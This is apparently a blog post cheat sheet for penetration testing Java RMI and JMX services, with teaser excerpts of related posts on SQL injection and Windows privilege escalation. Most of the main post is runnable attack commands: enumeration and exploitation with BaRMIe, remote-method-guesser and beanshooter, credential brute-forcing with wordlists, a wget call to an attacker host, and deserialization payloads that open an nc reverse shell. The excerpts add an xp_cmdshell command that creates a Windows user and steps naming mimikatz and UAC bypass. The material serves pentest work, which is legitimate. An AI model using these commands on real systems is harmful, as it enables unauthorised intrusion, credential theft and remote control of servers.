Skip to main content

JMX RMI Pentest

 
RMI can be run on any nonstandard port and when RMI is running you will observer one more endpoint port connected to it (find it from nmap easily by running rmi-dumpregistry )

#jmxrmi  bound name and its signatures might be vulnerable to MLetMbean Vuln, where MBean that can be used for loading additional MBeans over the network.
java.lang.String getVersion()
javax.management.remote.rmi.RMIConnection newClient(java.lang.Object arg)
Java RMI Registry - Port 1616

nmap -Pn -sS -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p 1616
BaRMIe

#Download the package from releases
https://github.com/NickstaDB/BaRMIe/releases/tag/v1.01 

java -jar BaRMIe.jar -enum 192.168.1.11 5000
java -jar BaRMIe.jar -attack 192.168.1.11 5000
Remote Method Guesser

https://github.com/qtc-de/remote-method-guesser  
java -jar rmg-3.0.0-jar-with-dependencies.jar 10.10.10.10 5000 enum

#Look for Vulnerabilities
java -jar rmg.jar enum 10.10.10.10 5000

#Get bound names & available method signatures
java -jar rmg.jar guess 10.10.10.10 5000

#Command Exec - Example
java -jar rmg.jar call 10.10.10.10 5000 "wget Attacker_IP:8000/worked" --signature 'String execute(String cmd)' --bound-name jmxrmi

#Exploit CVE-2019-2684; Try to bind client locally; doesnt work for JMX RMI
java -jar rmg.jar bind 10.10.10.10 5000 10.11.11.11:8080 my-object --localhost-bypass 
Beanshooter
#Good for JMX Severs
Source - https://github.com/qtc-de/beanshooter#Serial 

#Download package from repo
https://github.com/qtc-de/beanshooter/releases

#Check for auth and possible attr
#If auth is enabled; cannot go further. 
java -jar beanshooter.jar info 10.10.10.10 5000

#Enum - Check for vulns (Auth and Pre-auth Deserialization)
java -jar beanshooter.jar enum 10.10.10.10 5000

#Bruteforce creds
java -jar beanshooter.jar brute 10.10.10.10 5000 --username-file /usr/share/wordlists/user.txt --password-file /usr/share/wordlists/pass.txt

#You might require ysoserial.jar, download and copy it to /opt/yso.jar or add an arg "--yso /opt/yso.jar"
#Get a REVERSE SHELL;
java -jar beanshooter.jar serial 10.10.10.10 5000 CommonsCollections6 "nc 10.11.11.11 443 -e ash" --username admin --password admin

#Add --preauth if pre-auth deserialization is enabled
java -jar beanshooter.jar serial 10.10.10.10 5000 --preauth CommonsCollections6 "nc 10.11.11.11 443 -e ash"

#If SSL is enabled
java -jar beanshooter.jar enum --ssl 10.10.10.10 5000

#If Remote MBean server Does not require auth
#This might require tonka; you can find it in beanshooter repo; 
https://github.com/qtc-de/beanshooter#deploy 
RMIScout

#Download the package 
https://github.com/BishopFox/rmiscout/releases

git clone https://github.com/BishopFox/rmiscout.git 

#Bruteforce
java -jar rmiscout.jar bruteforce -i lists/methods.txt -r void,boolean,long -p String,int -l 1,4 <host> <port>

#Wordlist
java -jar rmiscout.sh wordlist -i lists/prototypes.txt <host> <port>


Comments

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds

Windows Priv Escallation

1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm

Forensics & Crypto

Online Decoder --> https://2cyr.com/decode/ Encoding errors -->  https://ftfy.now.sh/ File Signatures List -->  Click here PCAP Analysis: -->  https://www.packettotal.com/ Online Cipher Decryptors: CyberChef  - Cipher Decoder   Crack Station-Hash Cracke r Decrypt Any Kind of Hash 1)  Cipher Statistics 2)  Index of Coincidence Calculator - Online IC Cryptanalysis Tool 3)  Tools List (Awesome and Fantastic Tools) Available on dCode 4)  Solve an Aristocrat or Patristocrat 5)  RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data 5-1)  RSA - Find PQ using N 6)  BertNase's Own Hide content in a Image made of blocks - npiet fun! 7)  Vigenere Solver - www.guballa.de 8)  Fernet (Decode) 9)  Unicode Text Steganography Encoders/Decoders 10)  All in ONE encoders and Decoders Tool 11) Cryptii - Decoder Image Forensics: 1)  Forensically, free online photo forensics tools - 29a.ch 2)  StegSolve to decryt data in